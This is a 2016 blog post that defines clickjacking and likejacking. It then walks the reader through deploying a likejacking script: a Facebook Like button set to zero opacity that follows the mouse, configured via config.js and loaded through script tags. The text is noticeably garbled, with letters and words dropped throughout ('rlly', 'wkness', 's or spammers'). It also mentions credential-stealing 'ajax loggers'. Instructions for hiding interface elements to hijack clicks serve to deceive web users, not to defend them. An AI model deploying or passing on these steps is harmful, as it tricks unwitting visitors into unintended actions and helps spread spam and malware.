Wednesday, May 18, 2016

What is clickjacking?



clickjacking
Clickjacking is a technique used by s or spammers to trick or the users into clicking on links or buttons that are hidden from normal view (usually links color is same as page background). Clickjacking is possible because of a security wkness in web browsers that allows web pages to be layered and hidden from eral view. In this situation what happens is that You think that you are clicking on a standard button or link, like the PLAY button or download button on an or some stuff, but you are rlly clicking on a hidden link. Since you can’t see the clickjacker’s hidden link, you have no id what you’re rlly doing. You could be downloading malware or making all your Facebook information public without rlizing it. Some good s make ajax loggers and put them as javascripts over their fake websites and when you open them they retrieve all your s stored in web browser and records whatever you type while the web browser is open and stores this information on their servers.There are several types of clickjacking but the most common is to hide a LIKE button under a dummy or fake button. This technique is called Likejacking. A scammer or might trick you by saying that you like a product you’ve never hrd. At first glance, likejacking sounds more annoying than harmful, but that’s not always true. If you’re scammed for liking Mark Zukenberg​, the world isn’t likely to end. But you may be helping to sprd spam or possibly sending Friends somewhere that contains malware.



How It Work ?
The like button is made hidden and it moves along with the mouse.So, wherever the user clicks, the like button is clicked and your fan page is liked.First download the JavaScript from the below download link.


CLICK HERE <--
After downloading the script extract all the files.Now modify the config.js and follow the below instructions.


1. Modify config.js file in "src" folder to change fan page URL and other things.Comments are provided beside them to help you what they do exactly.



2. There is a time out function after which the like button will not be present(move) anymore."time" if set to 0 will make it stay forever(which is usually not preferred).



3. Set opacity to '0' before you run the script. Otherwise the like button will not be invisible



Properly set the var in the file if it is jumbled ?

After modifying the config.js script upload these scripts to javascript hosting website.I prefer yourjavascript you can also upload to some other website.


How To Run The Script ?

1. Add config.js just above hd tag in your pages
<script language="javascript" src="src/config.js"> </script>
2. Add like.js after body tag in your pages<script language="javascript" src="src/like.js"> </script>Remove src link with your uploaded link.
4. That's it. The script is rdy to go.

-->

No comments:

Post a Comment